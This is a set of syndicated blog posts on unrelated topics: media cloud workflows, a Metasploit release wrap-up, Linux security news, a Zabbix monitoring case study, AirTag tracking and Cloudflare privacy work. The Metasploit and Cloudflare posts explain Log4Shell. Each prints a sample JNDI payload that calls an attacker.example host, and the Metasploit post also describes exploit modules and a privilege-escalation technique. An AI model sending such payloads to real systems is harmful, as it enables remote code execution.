Hybrid Cloud and Modern Workflows for Media Teams

Post Syndicated from Amanda Fesunoff original https://www.backblaze.com/blog/hybrid-cloud-and-modern-workflows-for-media-teams/

By any metric, the demands on media workflows are growing at an unprecedented rate. A Coughlin Associates report surveying media and entertainment professionals predicts that overall cloud storage capacity for media and entertainment will grow more than 13.8 times between 2020 and 2026 (from roughly 10.1EB to 140EB). It also predicts that, by the next decade, the total video captured for a high-end digital production could reach hundreds of petabytes, approaching one exabyte.

Businesses in the media and entertainment industry—from creative teams to production houses to agencies—must manage larger and larger stores of data and streamline production workflows that interact with those stores of data. Optimizing data-heavy workflows provides you with time and cost savings you can reinvest to prioritize the creative work that drives your business.

In today’s post, we’ll examine the trends shaping the media storage landscape, walk through each step of the media workflow, and provide strategies and tactics for reducing friction at each step along the way. Read on to learn how to modernize your media workflow to meet today’s data-heavy demands.

➔ Download Our Media Workflows E-book

Media Technology Trends and Impacts on Media Workflows

Technology is driving changes in media workflows. The media landscape of today looks very different than it did even a few short years ago. If you’re responsible for managing data and workflows for a creative team, understanding the broad trends in the media landscape can help you prepare to optimize your workflows and future-proof your data infrastructure. Here are a few key trends we see driving change across the media storage landscape.

Trend 1: Increased Demand for VR and Higher Resolution 4K and 8K Video Is Driving Workflow Modernization

While VR has been somewhat slow to build steam, demand for VR experiences has grown as the technology has evolved. The industry as a whole is growing at a fast pace, with the global VR market size projected to increase from less than $5 billion in 2021 to more than $12 billion by 2024. Today, demand for stereoscopic VR, and VR in general, has increased storage requirements as data sets grow exponentially. Similarly, higher resolution demands more from media workflows, including more storage space, greater standards for compression, and higher performance hardware. All of these files also need to be constantly available and secure. As such, media workflows increasingly value scalable storage, as having to wait for additional storage can stall project momentum and delay delivery.

Trend 2: Archiving and Content Preservation Needs Are Driving Storage Growth

While the need to digitally convert data from traditional film and tape has slowed, the enormous demand for digital storage for archived content continues to grow. According to the Coughlin Report, more than 174 exabytes of new digital storage will be used for archiving and content conversion and preservation by 2024.

Just as your storage needs for active projects continue to grow with ever-larger file sizes, expect to invest in storage for archival purposes as production continues apace. Furthermore, if you have content conversion or preservation needs, plan for storage to house the digital copies. The plus side of this surge in archival and preservation demand is that the storage market will remain competitive, giving you plenty of choices at competitive rates.

Trend 3: Cloud Adoption Is Playing an Important Role in Enabling Collaboration Across Teams and Geographies

A study by MESA of nearly 700 decision-makers and managers from media and entertainment companies found that they expect 50% of their workforce to continue working remotely. Accessing resources remotely used to be a challenge mired in latency issues, restrictions on file size, and subpar collaboration tools, but cloud adoption has eased these issues and will continue to do so as companies increasingly embrace long-term remote collaboration.

As you think about future-proofing your architecture, cost is one factor to consider, but so is designing an architecture that enables your existing workflows to function remotely. A cloud storage provider with predictable pricing can address cost considerations and make cloud adoption even more of a no-brainer. And media teams can adopt cloud-native solutions or integrate existing on-premises infrastructure with the cloud without additional hardware purchasing and maintenance. The result is that time and money that would have been spent on hardware can be reinvested into adopting new technology, meeting customers’ needs, and differentiating from competitors.

Steps in the Modern Media Workflow

With an understanding of these overarching trends, media and entertainment professionals can evaluate and analyze their workflow to meet future demands. To illustrate that, we’ll walk through an example cloud storage setup within a media workflow, including:

  1. Ingest to Local Storage.
  2. Video Editing Software.
  3. Media Asset Managers.
  4. Archive.
  5. Backup.
  6. Transcoding Software.
  7. Content Delivery.
  8. Cloud Storage.

Ingest to Local Storage

Creatives working on active projects need high-performance, locally accessible storage such as NAS or SAN devices. These are often backed up to cloud storage to keep an off-site copy of current projects. Some examples include Synology and QNAP NAS devices as well as the OWC Jellyfish system. With Synology, you can use the Cloud Sync application to sync your files directly to your cloud bucket; Synology also offers many built-in integrations with various cloud providers. For QNAP, you can use QNAP Hybrid Backup Sync to archive or back up your content to your cloud account. OWC Jellyfish is optimized for video production workflows, and the Jellyfish lineup is embraced by video production teams for on-prem storage.
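If your NAS or a workstation can run scripts, the same off-site copy can be made with any S3-compatible client. The sketch below is a minimal illustration in Python using boto3; the endpoint, bucket name, and project path are placeholders for your own values, and the vendor tools above (Cloud Sync, Hybrid Backup Sync, and the Jellyfish integrations) handle this for you without any scripting.

# Minimal sketch: copy a local project folder to an S3-compatible bucket.
# Assumes boto3 is installed and credentials are set in the environment;
# the endpoint, bucket, and folder below are placeholders, not recommendations.
import os
import boto3

s3 = boto3.client(
    "s3",
    endpoint_url="https://s3.us-west-004.backblazeb2.com",  # your provider's S3 endpoint
)

BUCKET = "media-offsite-copy"              # hypothetical bucket name
PROJECT_DIR = "/volume1/projects/show-01"  # hypothetical local project folder

for root, _dirs, files in os.walk(PROJECT_DIR):
    for name in files:
        local_path = os.path.join(root, name)
        key = os.path.relpath(local_path, PROJECT_DIR)  # preserve folder structure as object keys
        s3.upload_file(local_path, BUCKET, key)
        print(f"uploaded {key}")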

Video Editing Software

Video editing software is used to edit, modify, generate, or manipulate video and movie files. Backblaze supports a number of editing tools, depending on your workflow. Adobe Premiere Pro and Avid Media Composer are two examples of film and video editing software; they are used to create videos, television shows, films, and commercials.

Media Asset Managers

A media asset manager, or MAM, is software used to add metadata, manage content, store media in a hybrid cloud, and share media. Examples of MAMs include iconik, eMAM, EditShare, and Archiware. You can store your media files directly to the cloud from these and other media asset managers, enabling monetization and quicker delivery of older content.

Archive

An archive often consists of completed projects and infrequently used assets that are stored away to keep primary production storage capacities under control. Examples of archive tools include LTO tape, external hard drives, servers, and cloud providers.

Backup

A backup is often used with new projects: raw media files are ingested into production systems and then backed up so that they can be easily restored in case of accidental deletion. Examples include LTO tape, external hard drives, servers, and cloud providers.

Transcoding Software

Transcoding software converts encoded digital files into alternative digital formats so that content can be viewed on the widest possible range of devices.
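To make the step concrete, here is a minimal sketch of transcoding automation in Python that shells out to ffmpeg, turning a mezzanine file into an H.264/AAC delivery MP4. It assumes ffmpeg is installed and on the PATH; the file names and quality settings are placeholders rather than recommendations.

# Minimal sketch: transcode a master file into an H.264/AAC delivery MP4.
# Assumes ffmpeg is installed and on the PATH; paths and settings are placeholders.
import subprocess

source = "master_prores.mov"      # hypothetical mezzanine/master file
delivery = "delivery_1080p.mp4"   # hypothetical delivery file

subprocess.run(
    [
        "ffmpeg",
        "-i", source,
        "-c:v", "libx264",           # H.264 video
        "-crf", "20",                # constant-quality encoding
        "-c:a", "aac",               # AAC audio
        "-movflags", "+faststart",   # put metadata up front for smoother streaming
        delivery,
    ],
    check=True,  # raise if ffmpeg exits with an error
)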

Content Delivery

Content delivery networks (CDNs) enable easy distribution of your content to customers. Examples include Fastly and Cloudflare. CDNs store content on edge servers closer to end users, speeding performance and reducing latency.

Cloud Storage

Cloud storage is integrated with all of the above tools, making it easy to store high resolution, native files for backup, active archives, primary storage, and origin stores. The media workflow tools have easy access to the stored content in the cloud via their user interface. Storing content in the cloud allows teams to easily collaborate, share, reuse, and distribute content. Cloud storage is also emerging as the storage of choice for workflows that use cloud-based MAMs.
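One small example of the sharing angle: most S3-compatible cloud storage can hand a collaborator a time-limited link to an object instead of re-uploading or emailing large files. A minimal sketch in Python with boto3, where the endpoint, bucket, and object key are placeholders:

# Minimal sketch: generate a time-limited download link for a stored asset.
# The endpoint, bucket, and key are placeholders; credentials come from the environment.
import boto3

s3 = boto3.client("s3", endpoint_url="https://s3.us-west-004.backblazeb2.com")

url = s3.generate_presigned_url(
    "get_object",
    Params={"Bucket": "media-offsite-copy", "Key": "show-01/rough-cut-v3.mov"},
    ExpiresIn=3600,  # link stays valid for one hour
)
print(url)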

The Benefits of Using a Hybrid Cloud Model for Media Workflows

Because media teams need both fast access and scalable storage, many adopt a hybrid cloud storage strategy. A hybrid cloud strategy combines a private cloud with a public cloud. For most media teams, the private cloud is typically hosted on on-premises infrastructure, but can be hosted by a third party. The key difference between a private and public cloud is that the infrastructure, hardware, and software for a private cloud are maintained on a private network used exclusively by your business or organization.

In a hybrid cloud workflow, media teams have fast, on-premises storage for active projects combined with the scalability of a public cloud to accommodate the large amounts of data media teams generate. Looking specifically at the cloud storage functions above, it is important to keep your local storage lean and mean so that it is fast and operating at peak performance for your creative team. This achieves two things. First, you don’t have to invest more in local storage, which can be expensive and time-consuming to maintain. And second, you can offload older projects to the cloud while maintaining easy accessibility.

According to a survey of IT decision-makers who adopted a hybrid cloud approach, 26% said faster innovation was the most important benefit their business gained, 25% said it allowed them to respond faster to their customers, and 22% said it gave their business better collaboration. Benefits of a hybrid cloud approach for media teams include:

  1. Affordability: Cloud storage can be lower cost versus expanding your own physical infrastructure.
  2. Accessibility: A hybrid cloud provides increased collaboration for a remote workforce.
  3. Scalability: Cloud scalability provides ease and control with scaling up or down.
  4. Innovation: Media teams have an increased ability to quickly test and launch new products or projects, when not bogged down by physical infrastructure.
  5. Data Protection & Security: Media teams benefit from reduced downtime and can bounce back more quickly from events, failures, or disasters.
  6. Flexibility: Hybrid solutions allow media teams to maintain control of sensitive or frequently used data on-premises while providing the flexibility to scale in the cloud.

Want to learn more about hybrid clouds? Download our free e-book, “Optimizing Media Workflows in the Cloud,” today.

The post Hybrid Cloud and Modern Workflows for Media Teams appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Metasploit weekly wrap-up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/01/28/metasploit-wrap-up-146/

I’m sure you know what’s coming: more Log4Shell

For those wondering when the Log4Shell remediation nightmare will end, I’m afraid I can’t give you that. What I can give you, though, is a new Log4Shell module! With the new module from zeroSteiner you can expect to get unauthenticated RCE on the Ubiquiti UniFi Controller Application via a POST request to the /api/login page. Be sure to leverage the module’s check function since scanners detecting header injection may not work.
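For context on the injection point (this is only an illustration of the general Log4Shell pattern, not the module’s exact payload), the controller’s login endpoint accepts a JSON body, and a JNDI lookup string placed in the remember field is what ends up being logged and evaluated by vulnerable versions:

POST /api/login
{
  "username": "anything",
  "password": "anything",
  "remember": "${jndi:ldap://attacker.example:1389/o=probe}"
}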

A new getsystem technique for Meterpreter

smashery has done an amazing job giving us a fifth getsystem technique in the Windows Meterpreter. This newest addition ports Clément Labro’s PrintSpoofer technique to Metasploit. It gains SYSTEM privileges from the LOCAL SERVICE and NETWORK SERVICE accounts by abusing the SeImpersonatePrivilege privilege. Like the other getsystem techniques, this attack takes place entirely in memory, without any additional configuration, on both 32-bit and 64-bit versions of Windows. It has been tested successfully on Windows 8.1 / Server 2016 and later. Unlike some of the other getsystem techniques, this one also has the advantage of not starting services, an action that is often flagged as malicious. Users can run this elevation technique directly by using the getsystem -t 5 command in Meterpreter. Now exploits that yield sessions with LOCAL SERVICE or NETWORK SERVICE permissions can easily be upgraded to full SYSTEM-level privileges.

New module content (2)

  • Grandstream UCM62xx IP PBX sendPasswordEmail RCE by jbaines-r7, which exploits CVE-2020-5722 – A new exploit module for CVE-2020-5722 has been added which exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices to go from an unauthenticated remote user to root level code execution.
  • UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell) by Nicholas Anastasi, RageLtMan, and Spencer McIntyre, which exploits CVE-2021-44228 – A module has been added to exploit CVE-2021-44228, an unauthenticated RCE in the Ubiquiti Unifi controller application versions 5.13.29 through 6.5.53 in the remember field of a POST request to the /api/login page. Successful exploitation results in OS command execution in the context of the server application.

Enhancements and features

  • #15904 from smashery – This PR adds the logic to support a fifth getsystem option using SeImpersonatePrivilege to gain SYSTEM privileges using the Print Spooler primitive on Windows. It is the Framework side of https://github.com/rapid7/metasploit-payloads/pull/509.
  • #16020 from VanSnitza – The auxiliary/scanner/scada/modbusclient module has been enhanced to support command 0x2B, which returns cleartext information about a device. Additionally, the module’s code has been updated to comply with RuboCop standards.
  • #16090 from audibleblink – A new method user_data_directory has been added to lib/msf/base/config.rb to allow users that use private Metasploit modules to keep module resources organized in the same way that MSF does for core modules, all whilst keeping their ~/.msf4 directory portable between installs.
  • #16096 from zeroSteiner – The implementation of the ReverseListenerComm and ListenerComm datastore options have now been updated to support specifying -1 to refer to the most recently created session without having to either remember what it was or change it when a new session is created.
  • #16106 from bwatters-r7 – This PR updates the stdapi_fs_delete_dir command to recursively delete the directory. Previously, we discovered some inconsistencies in the handling of directory deletion across Meterpreter payloads, and this implements a fix in the Linux Meterpreter to support recursive deletion of directories, even if they contain files, matching implementations in other Meterpreter types.

Bugs fixed

  • #16054 from namaenonaimumei – This PR updates John the Ripper (JTR) compatibility by altering the flag used to prevent logging.
  • #16104 from zeroSteiner – Fixes a crash in the portfwd command which occurred when pivoting a reverse_http Python Meterpreter through a reverse_tcp Windows Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub.

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

[$] Handling argc==0 in the kernel

Post Syndicated from original https://lwn.net/Articles/882799/rss

By now, most readers are likely to be familiar with the Polkit vulnerability known as CVE-2021-4034. The fix for Polkit is relatively straightforward and is being rolled out across the net. The root of this problem, though, lies in a misunderstanding about how programs are run on Unix-like systems. This problem is highly likely to exist in other programs, so it would be nice to find a more general solution. The best place to address this issue may be in the kernel, but properly working around this misunderstanding without causing regressions is not an easy task.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/883047/rss

Security updates have been issued by CentOS (java-1.8.0-openjdk), Debian (graphicsmagick), Fedora (grafana), Mageia (aom and roundcubemail), openSUSE (log4j and qemu), Oracle (parfait:0.5), Red Hat (java-1.7.1-ibm and java-1.8.0-openjdk), Slackware (expat), SUSE (containerd, docker, log4j, and strongswan), and Ubuntu (cpio, shadow, and webkit2gtk).

Zabbix meets television – Clever use of Zabbix features by Wolfgang Alper / Zabbix Summit Online 2021

Post Syndicated from Wolfgang Alper original https://blog.zabbix.com/zabbix-meets-television-clever-use-of-zabbix-features-by-wolfgang-alper-zabbix-summit-online-2021/19181/

TV broadcasting infrastructures have seen many great paradigm shifts over the years. From TV to live streaming – the underlying architecture consists of many moving parts supplied by different vendors and solutions. Any potential problems can cause critical downtimes, which are simply not acceptable. Let’s look at how Zabbix fits right into such a dynamic and ever-changing environment.

The full recording of the speech is available on the official Zabbix Youtube channel.

In this post, I will talk about how Zabbix is used in ZDF – Zweites Deutsche Fernsehen (Second German Television). I will specifically focus on the most unique and interesting use cases, and I hope that you will be able to use this knowledge in your next project.

ZDF – Some history

Before we move on with our unique use cases, I would like to introduce you to the history of ZDF. This will help you understand the scope and the potential complexity and scale of the underlying systems and company policies.

  • In 1961, the federal states established a central non-profit television broadcaster – Zweites Deutsches Fernsehen
  • On April 1, 1963, ZDF officially went on air and reached 61 percent of television viewers
  • On the Internet, a selection of programs is offered via live stream or video-on-demand through the ZDFmediathek, which has been in existence since 2001
  • Since February 2013, ZDF has been broadcasting its programs around the clock as an internet live stream
  • As of today, ZDF is one of the largest public broadcasters in Europe with permanent bureaus worldwide and is also present on various platforms like Youtube, Facebook, etc.

Here we can see that, over the years, ZDF has made some major leaps – from a television broadcaster reaching a majority of viewers to offering an on-demand video service and moving to 24/7 internet live streams. ZDF has also scaled up its presence across multiple digital platforms as well as its physical presence all over the globe.

Integrating Zabbix with an external infrastructure monitoring system

In our first use case, we will cover integrating Zabbix with an external infrastructure monitoring system. As opposed to monitoring IT metrics like hard drive space, memory usage, or CPU loads – this external system is responsible for monitoring devices like power generators, transmission stations, and other similar components. The idea was to pass the states of these components to Zabbix. This way, Zabbix would serve as a central “Umbrella” monitoring system.

In addition, the components that are monitored by the external system have states and severities, but the severities are not static and can vary depending on the monitored component. What this means is that each component could generate problems of varying severities. We had to figure out a way to assign the correct severities to each of the external components. Our approach was split into multiple steps:

  • Use Zabbix built-in HTTP check to get LLD discovery data
    • The external monitoring system provides an API, which we can use to obtain the necessary LLD information by using the HTTP checks
    • Zabbix-sender was used for testing since the HTTP items support receiving data from it
  • Use Zabbix built-in HTTP check as a collector to obtain the component status metrics
  • Define item prototypes as dependent items to extract data from the collector item
  • Create “smart” trigger prototypes to respect severity information from the LLD data

The JSON below is an example of the LLD data that we are receiving from the external monitoring systems. In addition to component names, descriptions, and categories, we are also providing the severity information. The severities that have a value of -1 are not used, while other severities are cross-checked with the status value retrieved from the returned metrics:

{
  "{#NAME}": "generator-secondary",
  "{#DISPLAYNAME}": "Secondary power generator",
  "{#DESCRIPTION}": "Secondary emergency power generator",
  "{#CATEGORY}": "Powersupply",
  "{#PRIORITY.INFORMATION}": -1,
  "{#PRIORITY.WARNING}": -1,
  "{#PRIORITY.AVERAGE}": -1,
  "{#PRIORITY.HIGH}": 1,
  "{#PRIORITY.DISASTER}": 2
}

Below we can see the returned metrics – the component name and its current status. For example, a status value of 1 references {#PRIORITY.HIGH} from the LLD JSON data.

"generator-primary": {
"status": 0,
"message": "Generator is healthy."
},
"generator-secondary": {
"status": 1,
"message": "Generator is not working properly."
},

We can see that the first generator returns status = 0, which means that the generator is healthy and there are no problems, while the secondary generator is currently not working properly – status = 1 and should generate a problem with severity High.

Below we can see how the item prototypes are created for each of the components – one item prototype collects the message information, while the other collects the current status of the component. We use JSONPath preprocessing to obtain these values from our master item.
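To make that concrete, the JSONPath expressions on the two item prototypes might look roughly like the following, with the {#NAME} macro resolved per component at discovery time (the exact form depends on how the master item’s JSON is structured, so treat these as an illustration):

$['{#NAME}'].status     (status item prototype)
$['{#NAME}'].message    (message item prototype)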

As for the trigger prototypes – we have defined a trigger prototype for each of the trigger severities. The trigger prototypes will then create triggers depending on the information contained in the LLD macros for a given component.

As you can see, the trigger expressions are also quite simple – each trigger simply checks if the last received component status matches the specific trigger threshold status value.
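Spelled out in current Zabbix trigger syntax (with a hypothetical template name and item key, so treat this as a sketch rather than the exact expression used), the High severity prototype would look roughly like this:

last(/External infrastructure/component.status[{#NAME}])={#PRIORITY.HIGH}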

The resulting metrics provide us both the status value and the component status message. As we can see, the triggers are also generating problems with dynamic severities.

Improving the solution with LLD overrides

The solution works – but we can do better! You might have already guessed the underlying issue with this approach: our LLD rule creates triggers for every severity, even if it isn’t used. The threshold value for these unused triggers will use value -1, which we will never receive, so the unused triggers will always stay in the OK state. Effectively – we have created 5 trigger definitions, while in our example, we require only 2 triggers.

How can we resolve this? Thankfully, Zabbix provides just the right tool for the job – LLD Overrides! We have created 5 overrides on our discovery rule – one for each severity:

In the override conditions, we will specify that if the value contained in the priority LLD macros is equal to -1, we will not be discovering the trigger of the specific severity.

The final result looks much cleaner – now we have only two trigger definitions instead of five. 

 

This is a good example of how we can use LLD together with master items obtaining data from external APIs and also improve the LLD logic by using LLD overrides.

“Sphinx” application monitoring using Graylog REST API

For our second example, we will be monitoring the Sphinx application by using the Graylog REST API. Graylog is a log management tool that we use for log collection – it is not used for any kind of alerting. We also have an application called Sphinx, which consists of three components – a Web component, an App component, and a WCF Gateway component. Our goals here are to:

  • Use Zabbix for evaluating error messages related to Sphinx from Graylog
  • Monitor the number of errors in user-defined time intervals for different components and alert when a threshold is exceeded
  • Analyze the incoming error messages and prepare them for a user-friendly output sorted by error types

The main challenges posed by this use-case are:

  • How to obtain Sphinx component information from Graylog
  • How to handle certificate problems (DH_KEY_TOO_SMALL / Diffie-Hellman key) due to an outdated version of the installed Graylog server
  • How to sort the error messages coming in “Free form” without explicit error types

Collecting the data from Graylog

Since the Graylog application used in the current scenario was outdated, we had to work around the certificate issues by using the Zabbix external check item type. Once again, we will be using master and dependent item logic – we will create three master items (one for each component) and retrieve the component data. All additional information will be retrieved by the dependent items so as not to cause extra performance impact by flooding the Graylog API endpoint. The data itself is parsed and sorted using Javascript preprocessing. The dependent item prototypes are used here to create the items for the obtained stats and the data used for visualizing each error type on a user-friendly dashboard.

Let’s take a look at the detailed workflow for this use case:

  • An external check that scans the Graylog stream: Sphinx App Raw
  • A dependent item that analyzes and filters the raw data by using preprocessing: Sphinx App Raw Filtered
  • This dependent item is used as a master item for our LLD rule: Sphinx App Error LLD
  • The same dependent item is also used as a master item for our item prototypes: Sphinx App Error count and Sphinx App Error List

Effectively this means that we perform only a single call to the Graylog API, and all of the heavy lifting is done by the dependent item in the middle of our workflow.
The following workflow is used to obtain the information only about the App component – remember, we have two other components where this will have to be implemented – Web and Gateway.

In total, we will have three master items, one for each of the Sphinx components:

They will use the following shell script to execute the REST API call to the Graylog API:

graylog2zabbix.sh[{$GRAYLOG_USERNAME},{$GRAYLOG_PASSWORD},{HOST.CONN},{$GRAYLOG_PORT},search/universal/relative?query=name%3Asphinx-app%20AND%20stage%3Aproduction%20AND%20level%3A(ERROR%20OR%20FATAL)&range=1800&limit=50&filter=streams%3A60000a8c1c09f9862279966e&fields=name%2Clevel%2Cmessage&decorate=true]

The data that we obtain this way is extremely hard to work with without any additional processing. It very much looks like a set of regular log entries – this complicates the execution of any kind of logic in reaction to receiving this kind of data:

For this reason, we have created a dependent item, which uses preprocessing to filter and sort this data. The dependent item preprocessing is responsible for:

  • Analyzing the error messages
  • Defining the error type
  • Sorting the raw data so that we can work with it more easily

We have defined two preprocessing steps to process this data. We have a JSONPath preprocessing step to select the message from the response and a Javascript preprocessing script that does the heavy lifting. You can see the Javascript script below. It uses regular expressions and performs data preparation and sorting. In the last line, you can see that the data is transformed back into JSON, so we can work with it down the line by using JSONPath preprocessing steps for our dependent items.

Below we can see the result. The data stream has been sorted and arranged by error types, which you can see on the left-hand side. All of the logged messages are now children that belong to one of these error types.

We have also created three LLD rules – one for each component. These LLD rules create items for each error type for each component. To achieve this, there is also some additional JSONPath and Javascript preprocessing done on the LLD rule itself:

The end result is a dashboard that uses the collected information to display the error count per component. Attached to the graph, we can see some additional details regarding the log messages related to the detected errors.

Monitoring of TV broadcast trucks

I would like to finish up this post by talking about a completely different use case – monitoring of TV broadcast trucks!

In comparison to the previous use cases – the goals and challenges here are quite unique. We are interested in a completely different set of metrics and have to utilize a different approach to obtain them. Our goals are:

  • Monitor several metrics from different systems used in the TV broadcast truck
  • Monitor the communication availability and quality between the broadcast truck and the transmitting station
  • Only monitor the broadcast truck when it is in use

One of the main challenges for this use case is avoiding false alarms. How can we avoid false positives if a broadcast truck can be put into operation at any time without notifying the monitoring team? The end goal is to monitor the truck when it’s in use and stop monitoring it when it’s not in use.

  • Each broadcast truck is represented by a host in Zabbix – this way, we can easily put it into maintenance
  • A control host is used to monitor the connection states of all broadcasting trucks
  • We decided on creating a middleware application that would be able to implement start/stop monitoring logic
    • This was achieved by switching the maintenance on/off by using the Zabbix API
  • A specific application in the broadcasting truck then tells Zabbix how long to monitor it and when to enable the maintenance for the said truck

Below we can see the truck monitoring workflow. The truck control host gets the status for each truck to decide when to start monitoring the truck. The middleware then starts/stops the monitoring of a truck by using Zabbix API to control the maintenance periods for the trucks. Once a truck is in service, it also passes the monitoring duration to the middleware, so the middleware can decide when the monitoring of a specific truck should be turned off.
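As a rough sketch of what the middleware’s call to Zabbix looks like, the snippet below creates a one-time maintenance window for a truck’s host over the JSON-RPC API. The method name maintenance.create is the real Zabbix API method; the URL, token, host ID, and duration are placeholders, and parameter details vary slightly between Zabbix versions.

# Minimal sketch: put a broadcast truck's Zabbix host into maintenance via the API.
# The URL, token, host ID, and duration are placeholders; adjust to your Zabbix version.
import time
import requests

ZABBIX_URL = "https://zabbix.example/api_jsonrpc.php"
AUTH_TOKEN = "replace-with-api-token"

def start_maintenance(host_id: str, duration_s: int) -> None:
    now = int(time.time())
    payload = {
        "jsonrpc": "2.0",
        "method": "maintenance.create",
        "params": {
            "name": f"truck-{host_id}-idle",
            "active_since": now,
            "active_till": now + duration_s,
            "hostids": [host_id],
            "timeperiods": [{"timeperiod_type": 0, "period": duration_s}],
        },
        "auth": AUTH_TOKEN,
        "id": 1,
    }
    response = requests.post(ZABBIX_URL, json=payload, timeout=10)
    response.raise_for_status()
    print(response.json())

start_maintenance("10105", 3600)  # hypothetical host ID, one hour of maintenance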

Next, let’s look at the truck control workflow from the Zabbix side.

  • Each broadcast truck is represented by a single trigger on the control host
    • The trigger actions forward the information that the truck maintenance period should be disabled to the middleware
  • Middleware uses the Zabbix API to disable the maintenance for the specific truck
  • The truck is now monitored
  • The truck forwards the Monitoring duration to the middleware
  • Once the monitoring duration is over, the middleware enables the maintenance for the specific truck

Finally, the trucks are displayed on a map which can be placed on our dashboards. The map displays whether a truck is in maintenance (not active) and whether it has any problems. This way, we can easily monitor our broadcast truck fleet.

From gathering data from external systems to performing complex data transformations with preprocessing and monitoring our whole fleet of broadcast trucks – I hope you found these use cases useful and were able to learn a thing or two about the flexibility of different Zabbix features!

The post Zabbix meets television – Clever use of Zabbix features by Wolfgang Alper / Zabbix Summit Online 2021 appeared first on Zabbix Blog.

Tracking Secret German Organizations with Apple AirTags

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/01/tracking-secret-german-organizations-with-apple-airtags.html

A German activist is trying to track down a secret government intelligence agency. One of her research techniques is to mail Apple AirTags to see where they actually end up:

Wittmann says that everyone she spoke to denied being part of this intelligence agency. But what she describes as a “good indicator” would be if she could prove that the postal address for this “federal authority” actually leads to the intelligence service’s apparent offices.

“To understand where mail ends up,” she writes (in translation), “[you can do] a lot of manual research. Or you can simply send a small device that regularly transmits its current position (a so-called AirTag) and see where it lands.”

She sent a parcel with an AirTag and watched through Apple’s Find My system as it was delivered via the Berlin sorting center to a sorting office in Cologne-Ehrenfeld, and then appeared at the Office for the Protection of the Constitution in Cologne.

So an AirTag addressed to a telecommunications authority based in one part of Germany ends up in the offices of an intelligence agency based in another part of the country.

Wittmann’s research is also now detailed in the German Wikipedia entry for the federal telecommunications service. It recounts how following her original discovery in December 2021, subsequent government press conferences have denied that there is such a federal telecommunications service at all.

Here’s the original Medium post, in German.

In a similar story, someone used an AirTag to track her furniture as a moving company lied about its whereabouts.

Happy Data Privacy Day!

Post Syndicated from Emily Hancock original https://blog.cloudflare.com/privacyday2022/

Happy Data Privacy Day 2022! Of course, every day is privacy day at Cloudflare, but today gives us a great excuse to talk about one of our favorite topics.

In honor of Privacy Day, we’re highlighting some key topics in data privacy and data protection that helped shape the landscape in 2021, as well as the issues we’ll be thinking about in 2022. The first category that gets our attention is the intersection of data security and data privacy. At Cloudflare, we’ve invested in privacy-focused technologies and security measures that enhance data privacy to help build the third phase of the Internet, the Privacy phase, and we expect to double down on these developments in 2022.

The second category is data localization. While we don’t think you need localization to achieve privacy, the two are inextricably linked in the EU regulatory landscape and elsewhere.

Third, recent regulatory enforcement actions in the EU against websites’ use of cookies have us thinking about how we can help websites run third-party tools, such as analytics, in a faster, more secure, and more privacy-protective way.

Lastly, we’ll continue to focus on the introduction of new or updated data protection regulations around the world, as well as regulation governing digital services, which will inevitably have implications for how personal and non-personal data is used and transferred globally.

Security to ensure Privacy

Cloudflare’s founding mission to help build a better Internet has always included focusing on privacy-first products and services. We’ve written before about how we think a key way to improve privacy is to reduce the amount of personal data flowing across the Internet. This has led to the development and deployment of technologies to help personal data stay private and keep data secure from would-be attackers. Examples of prominent technologies include Cloudflare’s 1.1.1.1 public DNS resolver — the Internet’s fastest, privacy-first public DNS resolver that does not retain any personal data about requests made — and Oblivious DNS over HTTPS (ODoH) — a proposed DNS standard co-authored by engineers from Cloudflare, Apple, and Fastly that separates IP addresses from queries, so that no single entity can see both at the same time.

We’re looking forward to continued work on privacy enhancing technologies in 2022, including efforts to generalize ODoH technology to any application HTTP traffic through Oblivious HTTP (OHTTP). Cloudflare is proud to be an active contributor to the Internet Engineering Task Force’s OHAI (Oblivious HTTP Application Intermediation) working group where Oblivious HTTP will be developed. Similar to ODoH, OHTTP allows a client to make multiple requests of a server without the server being able to link those requests to the client or to identify the requests as having come from the same client.

But there are times when retaining identity is important, such as when you are trying to access your employer’s network while working from home — something many of us have become all too familiar with over the past two years. However, organizations shouldn’t have to choose between protecting privacy and implementing Zero Trust solutions to guard their networks from common remote work pitfalls: employees working from home who fail to access their work networks through secure methods or fall victim to phishing and malware attacks.

So not only have we developed Cloudflare’s Zero Trust Services to help organizations secure their networks, we also went beyond mere security to create privacy-enhancing Zero Trust products. In 2021, the Cloudflare Zero Trust team took a big privacy step forward by building and launching Selective Logging into Cloudflare Gateway. Cloudflare Gateway is one component of our suite of services that helps enterprises secure their networks. Other components include Zero Trust access for an enterprise’s applications that allows for the authentication of users on our global network and a fast and reliable solution for remote browsing that allows enterprises to execute all browser code in the cloud.

With Selective Logging, Gateway Admins can now tailor their logs or disable all Gateway logging to fit an enterprise’s privacy posture. Admins can “Enable Logging of only Block Actions,” “Disable Gateway Logging for Personal Information,” or simply “Disable All Gateway Logging.” This allows an enterprise to decide not to collect any personal data for users who are accessing their internal organizational networks. The less personal data collected, the less chance any personal data can be stolen, leaked, or misused. Meanwhile, Gateway still protects enterprises by blocking malware or command & control sites, phishing sites, and other URLs that are disallowed by their enterprise’s security policy.

As many employers have moved to permanent remote work, at least part-time, Zero Trust solutions will continue to be important in 2022. We are excited to give those employers tools that help them secure their networks in ways that allow them to simultaneously protect employee privacy.

Of course, we can’t talk about pro-privacy security issues without mentioning the Log4j vulnerability exposed last month. That vulnerability highlighted just how critically important security is to protecting the privacy of personal data. We explained in depth how this vulnerability works, but in summary, the vulnerability allowed an attacker to execute code on a remote server. This can allow for the exploitation of Java-based, Internet-facing software that uses Log4j, but what makes Log4j even more insidious is that non-Internet-facing software can also be exploitable as data gets passed from system to system. For example, a User-Agent string containing the exploit could be passed to a backend system written in Java that does indexing or data science, and the exploit could get logged. Even if the Internet-facing software is not written in Java, it is possible that strings get passed to other systems that are in Java, allowing the exploit to happen.
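As a minimal illustration of that pass-through behavior (the host name here is a placeholder), an attacker only needs to get a string like the following logged anywhere along the chain, for example in a User-Agent header, for a vulnerable Log4j instance to reach out and load attacker-controlled code:

User-Agent: ${jndi:ldap://attacker.example/a}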

